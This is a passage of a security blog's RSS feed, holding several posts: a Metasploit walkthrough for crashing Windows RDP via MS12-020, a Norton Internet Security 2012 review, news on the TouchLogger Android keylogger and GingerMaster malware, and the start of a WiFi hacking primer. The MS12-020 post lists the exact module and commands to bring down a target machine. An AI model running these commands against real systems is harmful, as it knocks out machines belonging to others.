Security researchers from Google, Eric Grosse and Mayank Upadhyay, have published a research paper, "Authentication at Scale", on using a USB key ring (a physical token) to authenticate users to the cloud. Grosse and Upadhyay's paper focuses on securing the future of cloud computing. I say securing the future because some big names have invested a fortune betting big on cloud computing, and 'security' is what is holding people back from large-scale adoption; 'authentication' is not the only concern, though. This study by Google researchers is a step forward into the world of cloud computing. I remember attending an AWS conference in Mumbai where everyone was discussing the possible benefits that cloud computing would provide, when one notorious chap introduced the discussion of 'security in the cloud'. That's when the AWS officials looked really pissed off. But that is the sad fact: 'security in the cloud' is very much over-hyped.&lt;br /&gt;
&lt;br /&gt;
To gain customer confidence it is important to use technologies that have not been broken before. If you are going to use the same old firewall to secure the network in the cloud, I am going to be skeptical about putting my data up there. Innovative thinking, like that displayed by Grosse and Upadhyay, is required to boost the business of cloud computing.&lt;img src="http://feeds.feedburner.com/~r/blogspot/Gotp/~4/o4V1SUs7yJk" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/blogspot/Gotp/~3/o4V1SUs7yJk/google-challenges-sheer-existence-of.html</link><author>noreply@blogger.com (Rahul Sachin Amey)</author><thr:total>0</thr:total><feedburner:origLink>http://www.techkranti.com/2013/01/google-challenges-sheer-existence-of.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2208382470258337434.post-7781964671032442682</guid><pubDate>Sun, 15 Apr 2012 07:48:00 +0000</pubDate><atom:updated>2012-04-15T13:23:24.610+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Metasploit</category><category domain="http://www.blogger.com/atom/ns#">Ethical Hacking</category><category domain="http://www.blogger.com/atom/ns#">Exploits</category><title>How to exploit MS12-020 (CVE-2012-0002) RDP vulnerability using Metasploit?</title><description>CVE-2012-0002 is a vulnerability in the Remote Desktop Protocol (RDP) implementation in Windows, reported to Microsoft by Luigi Auriemma through the Zero Day Initiative. The patch was released on March 13, 2012 as MS12-020. The flaw is reachable before authentication and can lead to full system compromise (remote code execution); failed or crude exploitation attempts crash the RDP service or the whole machine, so it is also a DoS.&lt;br /&gt;
&lt;br /&gt;
Metasploit has a working DoS module for this vulnerability. The remote system must have Remote Desktop Services (Terminal Services) enabled and reachable on TCP port 3389 for it to work, and since the module crashes the target, run it only against systems you own or are authorised to test. Here's how it goes:&lt;br /&gt;
&lt;br /&gt;
1. Start msfconsole&lt;br /&gt;
&lt;br /&gt;
2. Give the command - use auxiliary/dos/windows/rdp/ms12_020_maxchannelids&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-MvbXGfWye8E/T4p6gPNKvJI/AAAAAAAAAew/2FKbc9xadfo/s1600/use.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="15" src="http://3.bp.blogspot.com/-MvbXGfWye8E/T4p6gPNKvJI/AAAAAAAAAew/2FKbc9xadfo/s400/use.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
3. Then set the IP address of the target system with the command - set RHOST &amp;lt;IP&amp;gt; (newer Metasploit versions name this option RHOSTS; the default RPORT is 3389)&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-PY37_oOvSXM/T4p7LgWHEVI/AAAAAAAAAe4/7hqHWF3UKh4/s1600/set.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="21" src="http://1.bp.blogspot.com/-PY37_oOvSXM/T4p7LgWHEVI/AAAAAAAAAe4/7hqHWF3UKh4/s400/set.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
4. Then give the command - 'run' to execute the module against the remote system&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-QG2Q1p6AJTI/T4p7uFpi6RI/AAAAAAAAAfA/0DYAN9_9cTY/s1600/run.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="88" src="http://1.bp.blogspot.com/-QG2Q1p6AJTI/T4p7uFpi6RI/AAAAAAAAAfA/0DYAN9_9cTY/s640/run.JPG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
I tried it on a local VM and the VM showed a BSOD.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-YGRgJXRUuvQ/T4p85ELJTEI/AAAAAAAAAfI/K8yaG0v2VTk/s1600/BSOD.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://1.bp.blogspot.com/-YGRgJXRUuvQ/T4p85ELJTEI/AAAAAAAAAfI/K8yaG0v2VTk/s320/BSOD.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
Happy Exploiting!!!&lt;img src="http://feeds.feedburner.com/~r/blogspot/Gotp/~4/aTluTDjeB5Q" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/blogspot/Gotp/~3/aTluTDjeB5Q/how-to-exploit-ms12-020-cve-2012-0002.html</link><author>noreply@blogger.com (Rahul Sachin Amey)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-MvbXGfWye8E/T4p6gPNKvJI/AAAAAAAAAew/2FKbc9xadfo/s72-c/use.JPG" height="72" width="72" /><thr:total>0</thr:total><georss:featurename>Mumbai, Maharashtra, India</georss:featurename><georss:point>19.0759837 72.8776559</georss:point><georss:box>18.835877699999998 72.5617989 19.3160897 73.19351289999999</georss:box><feedburner:origLink>http://www.techkranti.com/2012/04/how-to-exploit-ms12-020-cve-2012-0002.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2208382470258337434.post-3166572268897364518</guid><pubDate>Wed, 14 Dec 2011 18:00:00 +0000</pubDate><atom:updated>2011-12-14T11:47:28.535+05:30</atom:updated><title>Norton Internet Security 2012: More than a Review</title><description>What is the one thing that reminds you that you have an Anti-virus installed on your system? Is it the alerts? Naa. You can actually go without being exposed to malware for quite a number of weeks. I think the thing that reminds you is the constant performance degradation of your machine when it runs its scheduled scans. If that is how you would define an Anti-virus, then my dear friends, I can irrefutably say that Norton Internet Security 2012 (NIS 2012) is not an anti-virus although it functions like one :).&lt;br /&gt;
&lt;br /&gt;
Symantec, with its latest addition NIS 2012, presents to you a new era of anti-virus software which won't eat up your processing power in return for securing your system. NIS really secures your system from all sorts of threats, may they be from the internet or from infected flash drives. I have been using NIS 2012 for about 3 months now and I should say that bidding adieu to my old Kaspersky was a pretty good decision. Fun fact about Kaspersky: I had set a daily full scan at 12 pm, and when I was at the peak of my work it would eat up all my memory, which probably belongs to me :). Here I am gonna explain some really cool features that NIS 2012 offers without depleting your precious memory.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1. Download Insight: &lt;/b&gt;
&lt;br /&gt;
&lt;br /&gt;
The most innovative feature that comes with NIS 2012 is Download Insight (DI). It takes care that the file you just downloaded from the Internet is free of malware. As soon as you download an executable on your system, NIS 2012 initiates DI to analyze the trustworthiness of the file, and within seconds it pops up an alert giving an 'Insight' on the downloaded file. &lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-tU797b7SRx0/Tt8CJhQ1a3I/AAAAAAAAAd4/4t1NB2ftg5s/s1600/Insight.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-tU797b7SRx0/Tt8CJhQ1a3I/AAAAAAAAAd4/4t1NB2ftg5s/s1600/Insight.JPG" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;
This is a really cool way to save yourself from threats for which signatures have not yet been downloaded by your AV. This brings us to the concept of &lt;b&gt;'Cloud-based Scanning'&lt;/b&gt;. Cloud-based scanning is the new buzzword in the security industry and a few security vendors are using the term although they often mean something very different.
&lt;br /&gt;
&lt;br /&gt;
The obvious advantage of cloud scanning is that the turnaround time for a definition to be available is extremely fast – as soon as a definition is available in the cloud, it is available to the user. What Symantec has done is to build a system that analyzes the reputation of the new software and files across the Internet and then calculates a reputation score for each of them. This system receives feeds from tens of millions of customers that anonymously participate in the Norton Community Watch program. The technology automatically starts working on calculating the reputation score as it becomes aware of new files.
&lt;br /&gt;
&lt;br /&gt;
We got in touch with Mr. David Hall, Consumer Product Marketing, Asia Pacific for Symantec, for more clarity about Download Insight. Mr. Hall says, "Now this is powerful – we have a system that can receive knowledge of new files worldwide and use a Symantec “secret sauce” algorithm to calculate the reputation score automatically! This information is immediately available to Download Insight through the cloud, but quite a bit different than just moving the old signature model to the cloud."
&lt;br /&gt;
&lt;br /&gt;
But how is the reputation score of a file determined?
&lt;br /&gt;
&lt;br /&gt;
A reputation score is calculated using a complex algorithm based on various parameters. Remember, the main feed into the Reputation system is the information received from the Norton Community Watch program. Here’s a list of a few parameters that are used to calculate the reputation score: &lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;How many instances of a particular file are seen?&lt;/li&gt;
&lt;li&gt;How long has that file been around? &lt;/li&gt;
&lt;li&gt;From which URLs were they downloaded? &lt;/li&gt;
&lt;li&gt;What is the basic health of the system that is submitting the data? &lt;/li&gt;
&lt;li&gt;Which software vendor does the file belong to?  &lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Download Insight in action  :&lt;/b&gt;
&lt;br /&gt;
&lt;br /&gt;
Download Insight monitors when new files are downloaded, and once the download is complete it goes into action:
&lt;br /&gt;
&lt;br /&gt;
This is the flow where the user chooses to save the application to a folder on the computer.  &lt;br /&gt;
&lt;ol&gt;
&lt;li&gt;Download Insight observes that the file download from the Internet is complete.&lt;/li&gt;
&lt;li&gt;It calculates the SHA256 hash of that file and immediately asks the online servers for a reputation score.&lt;/li&gt;
&lt;li&gt;Based on the reputation score, Download Insight will:&lt;br /&gt;
a. Delete the application if the reputation score is at a “Bad” level and display a notification to the user.&lt;br /&gt;
b. Allow the file to persist if the reputation score is “Good” and display a corresponding notification.&lt;br /&gt;
c. Provide additional information when the score for the file is still being evaluated.&lt;/li&gt;
&lt;/ol&gt;
&lt;br /&gt;
The “View Details” link for each notification provides more information from Symantec's servers. Here are a few examples: &lt;br /&gt;
&lt;ol&gt;
&lt;li&gt;Prevalence – How widely used is this file in the Norton Community? It can range from very few instances to millions of machines.&lt;/li&gt;
&lt;li&gt;Age – How long has this file been around?&lt;/li&gt;
&lt;li&gt;Reputation Rating – What does Norton think of this file? It provides an indication of how trustworthy the file is.&lt;/li&gt;
&lt;li&gt;URL – This provides the website from which this file was downloaded.&lt;/li&gt;
&lt;/ol&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-63g7Ym897B8/TtuR-0kRcGI/AAAAAAAAAdY/86SHzz9SB4c/s1600/norton+insight.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://4.bp.blogspot.com/-63g7Ym897B8/TtuR-0kRcGI/AAAAAAAAAdY/86SHzz9SB4c/s400/norton+insight.bmp" width="378" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;br /&gt;

&lt;b&gt;Run the downloaded file:&lt;/b&gt;&lt;br /&gt;

The second user flow where Download Insight participates is when you run the application downloaded from the Internet – it could be right after you download the application or a couple of days later when you choose to install it. If the reputation of the file was still being evaluated (yellow notification in Figure 1), Norton alerts the user with a dialogue that provides the information shown in Figure 2 and has a recommendation on what the user can do with the application. It looks like:
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-ybl1B4V8AeI/TtuTGx7K-aI/AAAAAAAAAdg/ViwSVuRVKRA/s1600/norton+insight+limewire.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://1.bp.blogspot.com/-ybl1B4V8AeI/TtuTGx7K-aI/AAAAAAAAAdg/ViwSVuRVKRA/s320/norton+insight+limewire.bmp" width="302" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;2. SONAR&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
SONAR provides real-time protection against threats: it proactively detects unknown security risks on your computer and identifies emerging threats based on the behavior of applications. SONAR identifies threats quicker than traditional signature-based detection techniques. It detects and protects you against malicious code even before virus definitions are available, monitoring your computer for malicious activity through heuristic detection. In fact, the improved SONAR technology in the Norton 2012 products monitors running applications for suspicious behavior to quickly detect and disable previously unknown threats.&lt;br /&gt;
&lt;br /&gt;
Some significant changes were made to SONAR when Symantec launched the Norton 2011 products last year, which included the latest SONAR 3 that built upon the successful, effective and efficient SONAR 2 behavioral security engine.  With SONAR 2, Symantec has a proven track record of being able to convict malware and secure Norton users from malware designed to evade most other security features. According to Symantec, "In nine months we prevented upward of 4.2 million infections out of about 140 million incidents that we analyzed for Norton users. Most of these incidents were never-before-seen malware and infection scenarios, thus truly providing "zero-day" protection! The effectiveness of our technology was repeatedly confirmed by external 3rd-party &lt;a href="http://www.symantec.com/about/news/release/article.jsp?prid=20091027_04"&gt;tests and reviews&lt;/a&gt; (specifically behavioral security tests and reviews), where we performed at or near 100% detection rates." 
&lt;br /&gt;
&lt;br /&gt;
Behavioral security is a critical security solution, especially in this era of server-side polymorphic malware where each and every infection can have a unique piece of malware file (unique from the file fingerprint perspective) downloaded on the victim's machine.&lt;br /&gt;
&lt;br /&gt;
SONAR aggregates and correlates information from a number of engines within the product like the Firewall, AV Engine, Intrusion Prevention Engine, etc. All this information is then used by the classifier to improve efficacy and this is a big differentiator for Norton. Most other security products simply don’t have this depth and breadth of information to make a good classifier. In SONAR 3 we have further enhanced our integration with the network component in order to classify, convict, and remediate malware on the basis of its malicious network activity. With this feature in place, we will continue to block and remove many new variants of malware that leave their network footprint unchanged.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;3. How does NIS 2012 assure Security without compromising Performance? &lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
NIS 2012 performs quick scans only when the system is idle, so your system is scanned only when you are away from it. We asked Symantec, "How does NIS select areas for performing quick scans?" Symantec's reply: "Norton will use idle time to scan against a list of files most commonly at risk. This varies dependent on the actual level of trust on the PC and other variables."&lt;br /&gt;
&lt;br /&gt;
But quick scans are not enough to completely secure your system, so NIS 2012 is scheduled to perform full system scans weekly. The full scans too are so silent that you'll hardly notice them. You can see the logs of full scans by visiting the Security History.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-ig_px3lRhFI/Tt8COJVLgWI/AAAAAAAAAeA/63LXvqaGvVE/s1600/Full+Scan.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="344" src="http://2.bp.blogspot.com/-ig_px3lRhFI/Tt8COJVLgWI/AAAAAAAAAeA/63LXvqaGvVE/s640/Full+Scan.JPG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;4. Intrusion Prevention&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
The intrusion prevention capabilities of NIS 2012 are good. It identifies all kinds of network-level attacks. I tried running a Nessus Scan against a virtual host where NIS was installed and the scan did not return any helpful results.

&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-5MWx53VycUU/Tt8GX5s16jI/AAAAAAAAAeI/bV6baJgYP6I/s1600/IPS.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="451" src="http://1.bp.blogspot.com/-5MWx53VycUU/Tt8GX5s16jI/AAAAAAAAAeI/bV6baJgYP6I/s640/IPS.JPG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;5. Some more miscellaneous yet useful&amp;nbsp;features:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;i. Performance Monitoring&lt;/b&gt;
NIS 2012 provides performance alerts if an application is eating a big chunk of your memory.
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-BNOAb4Bk2Ag/Tt8LwRs59oI/AAAAAAAAAeQ/laIQe5YGwp4/s1600/PerfAlert.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-BNOAb4Bk2Ag/Tt8LwRs59oI/AAAAAAAAAeQ/laIQe5YGwp4/s1600/PerfAlert.JPG" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-7fjPiOomSHE/Tt8Lxa_F6QI/AAAAAAAAAeU/VVaHJWwDFTI/s1600/PerfAlert1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="288" src="http://4.bp.blogspot.com/-7fjPiOomSHE/Tt8Lxa_F6QI/AAAAAAAAAeU/VVaHJWwDFTI/s400/PerfAlert1.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;ii. Safe Search&lt;/b&gt;&lt;br /&gt;
This has been a prevalent feature in many modern day anti-viruses. NIS 2012 also ships with IE, Firefox and Chrome plugins that verify the safety of the sites that links on a search results page point to. The image below is self-explanatory.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-pO8pZxWrbjU/TudY7y4QpvI/AAAAAAAAAeg/NFuFDW5pXLk/s1600/SafeSearch.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="228" src="http://2.bp.blogspot.com/-pO8pZxWrbjU/TudY7y4QpvI/AAAAAAAAAeg/NFuFDW5pXLk/s640/SafeSearch.JPG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;iii. Browser Protection&lt;/b&gt;&lt;br /&gt;
If NIS 2012 detects malicious content on an HTML page trying to exploit a vulnerability on your browser (especially when you are using IE ;)), it immediately discontinues the connection and pops up a malicious site banner.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;iv. Identity Safe&lt;/b&gt;&lt;br /&gt;
Identity Safe is a password management plugin for your browser: you set a master password and save all your logins, which saves you from the nuisance of typing your credentials at every authentication page you visit.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;6. Graphical User Interface&lt;/b&gt;&lt;br /&gt;
The interface provided with NIS 2012 is very intuitive and easy to use. Here are some key things you can do using the GUI.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-7hed0TZQaRQ/TudaL7WLx-I/AAAAAAAAAeo/eUWQz35avU4/s1600/NIS+Main.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="425" src="http://2.bp.blogspot.com/-7hed0TZQaRQ/TudaL7WLx-I/AAAAAAAAAeo/eUWQz35avU4/s640/NIS+Main.JPG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
The huge world map there shows you the worldwide cybercrime activity for the past 24 hours. It also lists the latest viruses that have been discovered, with a link that provides more information on each.&lt;br /&gt;
&lt;br /&gt;
If you dig deeper into the Advanced tab, you get to see your recent history of threats and the ratings of applications installed on your system.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;7. Minds its own Business&lt;/b&gt;&lt;br /&gt;
Being in the security field, I have to deal with a lot of tools which any Anti-Virus will report as a threat. But it is my choice to use them for my research. So when I tell NIS 2012 not to touch a certain location, it obeys like a very faithful companion, while also reminding me about the risks I am exposed to by making this exclusion.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Moral:&lt;/b&gt;&lt;br /&gt;
NIS 2012 is a product made for all... From the Noob to the Geek... It kinda protects you at every step of your online life.&lt;br /&gt;
&lt;br /&gt;
Lets take a scenario:&lt;br /&gt;
Suppose I am the dumbest person on this planet, the biggest n00b ever born. I have NIS 2012 installed. Let's see how NIS 2012 protects me from any possible malware:&lt;br /&gt;
&lt;br /&gt;
1. I open my browser, google for "Some random executable". NIS 2012 tells me which search results are good and which are malicious.&lt;br /&gt;
&lt;br /&gt;
2. I visit some random website and download the file. NIS 2012 initiates Download Insight and checks the trustworthiness of the file.&lt;br /&gt;
&lt;br /&gt;
3. I execute the downloaded file. NIS 2012 initiates its scanning engine to check for any viruses on the file.&lt;br /&gt;
&lt;br /&gt;
4. The file has been executed. NIS 2012's SONAR functionality will check the application activity for any suspicious actions.&lt;br /&gt;
&lt;br /&gt;
So NIS 2012 has made sure that my PC is secure at every phase of my online and offline activity. So, effectively, along with it being a good Anti-virus, it is also Stupidity-proof ;).&lt;br /&gt;
&lt;br /&gt;
On an ending note: Auditing servers is a part of my job. I see a lot of companies using cheap Anti-viruses which provide no real value add to the security infrastructure. It would be my humble recommendation to all those admins out there to use NIS 2012 as their AV (if you really wanna keep your data secure; if you just want to show compliance, use any, it doesn't matter).&lt;br /&gt;
&lt;br /&gt;
If you want to make a choice on buying an AV... I don't see any wiser decision than Norton Internet Security 2012.&lt;img src="http://feeds.feedburner.com/~r/blogspot/Gotp/~4/FndEBO3y8lg" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/blogspot/Gotp/~3/FndEBO3y8lg/norton-internet-security-2012-more-than.html</link><author>noreply@blogger.com (Rahul Sachin Amey)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-tU797b7SRx0/Tt8CJhQ1a3I/AAAAAAAAAd4/4t1NB2ftg5s/s72-c/Insight.JPG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.techkranti.com/2011/12/norton-internet-security-2012-more-than.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2208382470258337434.post-8088540365965594738</guid><pubDate>Sun, 21 Aug 2011 06:40:00 +0000</pubDate><atom:updated>2011-08-21T12:15:11.101+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking Tools</category><category domain="http://www.blogger.com/atom/ns#">Security Tools</category><category domain="http://www.blogger.com/atom/ns#">Security News</category><category domain="http://www.blogger.com/atom/ns#">Hacking News</category><category domain="http://www.blogger.com/atom/ns#">Ethical Hacking</category><category domain="http://www.blogger.com/atom/ns#">android</category><category domain="http://www.blogger.com/atom/ns#">Exploits</category><title>Key Logger for Android</title><description>Computer scientists from UC Davis have developed an Android app named TouchLogger that logs keystrokes using a smartphone's sensors to measure the locations a user taps on the touch screen.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-4-bEFG_VsOM/TlClx15Rb0I/AAAAAAAAAdQ/s3nF2_5EjMY/s1600/htc_logger.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="192" src="http://1.bp.blogspot.com/-4-bEFG_VsOM/TlClx15Rb0I/AAAAAAAAAdQ/s3nF2_5EjMY/s320/htc_logger.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Researchers have demonstrated that it is possible to log individual keystrokes entered on a smartphone's on-screen keyboard using the device's built-in accelerometer (also known as the gyroscope). The researchers were able to correlate the movements of the phone with individual keystrokes on an all-numeric keypad with an accuracy of about 70%. With minor refinements, the researchers believe they can expand the effectiveness of TouchLogger.&lt;br /&gt;
&lt;br /&gt;
Applications like these can be potentially dangerous, as an application does not require special privileges to access the device's accelerometer. Major smartphones, like Apple's iPhone, RIM's Blackberry, etc. give a user the freedom to grant applications special permissions that define their level of access. Usually, within these permissions, not much importance is given to those pertaining to the device's movements.&lt;br /&gt;
&lt;br /&gt;
The developers of TouchLogger created this application as a PoC to be presented at HotSec'11, San Francisco. The presentation video is available &lt;a href="http://www.usenix.org/media/events/hotsec11/tech/videos/cai.mp4"&gt;here&lt;/a&gt; (mp4) and the paper can be downloaded from &lt;a href="http://regmedia.co.uk/2011/08/17/touchlogger_research_paper.pdf"&gt;here&lt;/a&gt;. A preliminary evaluation of the tool was done using an HTC Evo 4G smartphone.&lt;br /&gt;
&lt;br /&gt;
The following table shows the distribution of inference results, which show the app being correct about 70% of the time.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-kAKGuKKuTXE/TlClxUSP7EI/AAAAAAAAAdM/-o9Ympl3o8Q/s1600/results.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="146" src="http://2.bp.blogspot.com/-kAKGuKKuTXE/TlClxUSP7EI/AAAAAAAAAdM/-o9Ympl3o8Q/s400/results.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
The scientists noted that the W3C recently published a specification for web applications to &lt;a href="http://dev.w3.org/geo/api/spec-source-orientation"&gt;access accelerometer and gyroscope sensors using JavaScript&lt;/a&gt;. They are in the process of extending their work into a full research project.
&lt;br /&gt;
&lt;br /&gt;
A less original, but rather more effective approach is taken by Android malware called &lt;a href="http://www.cs.ncsu.edu/faculty/jiang/GingerMaster/"&gt;GingerMaster&lt;/a&gt;. It uses a root exploit called GingerBreak to permanently compromise the smartphone. According to security researcher Xuxian Jiang, GingerMaster is the first piece of malware to deploy a root exploit for Android 2.3.3 "Gingerbread". It is concealed in repackaged legitimate apps and registers a receiver which will be notified when the smartphone has finished booting. Once installed, it then launches a background service.&lt;br /&gt;
&lt;br /&gt;
Subscribe to &lt;a href="http://feeds.feedburner.com/blogspot/Gotp"&gt;Techkranti feeds&lt;/a&gt;&lt;br /&gt;
To receive updates on your mobile, &lt;a href="http://labs.google.co.in/smschannels/subscribe/techkranti"&gt;Click here&lt;/a&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/Gotp/~4/V-lCD10tfIA" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/blogspot/Gotp/~3/V-lCD10tfIA/key-logger-for-android.html</link><author>noreply@blogger.com (Rahul Sachin Amey)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-4-bEFG_VsOM/TlClx15Rb0I/AAAAAAAAAdQ/s3nF2_5EjMY/s72-c/htc_logger.JPG" height="72" width="72" /><thr:total>0</thr:total><georss:featurename>Mumbai, Maharashtra, India</georss:featurename><georss:point>19.0176147 72.8561644</georss:point><georss:box>18.7774257 72.5403074 19.2578037 73.17202139999999</georss:box><feedburner:origLink>http://www.techkranti.com/2011/08/key-logger-for-android.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2208382470258337434.post-8480083426625931347</guid><pubDate>Fri, 20 May 2011 07:54:00 +0000</pubDate><atom:updated>2011-05-20T13:24:02.378+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">WiFi Hacking</category><title>WiFi Hacking Basics Part 3</title><description>So in the last post we learned the basic terminology, channels and frequencies of WLAN.&lt;br /&gt;
In this post we'll look at beacon frames and authentication in WiFi.&lt;br /&gt;
There are two terms you should know about WiFi.&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;ESSID - the network name (what you see as the connection name)&lt;/li&gt;
&lt;li&gt;BSSID - the MAC address of the AP&lt;/li&gt;
&lt;/ul&gt;There are three important packet types we need to care about: &lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Management packets: used for connection management, e.g. association request, association response&lt;/li&gt;
&lt;li&gt;Data packets: these carry the actual data; there is no need to explain them further.&lt;/li&gt;
&lt;li&gt;Control packets: these packets are used for effective transmission of data, e.g. CTS, RTS&lt;/li&gt;
&lt;/ul&gt;We are concerned here with management frames:&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;&lt;b&gt;Authentication frame&lt;/b&gt;: 802.11 authentication is a process whereby the access point either accepts or rejects the identity of a radio NIC. The NIC begins the process by sending an authentication frame containing its identity to the access point. With open system authentication (the default), the radio NIC sends only one authentication frame, and the access point responds with an authentication frame as a response indicating acceptance (or rejection). With the optional shared key authentication, the radio NIC sends an initial authentication frame, and the access point responds with an authentication frame containing challenge text. The radio NIC must send an encrypted version of the challenge text (using its WEP key) in an authentication frame back to the access point. The access point ensures that the radio NIC has the correct WEP key (which is the basis for authentication) by seeing whether the challenge text recovered after decryption is the same that was sent previously. Based on the results of this comparison, the access point replies to the radio NIC with an authentication frame signifying the result of authentication.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Deauthentication frame&lt;/b&gt;: A station sends a deauthentication frame to another station if it wishes to terminate secure communications.&lt;/li&gt;
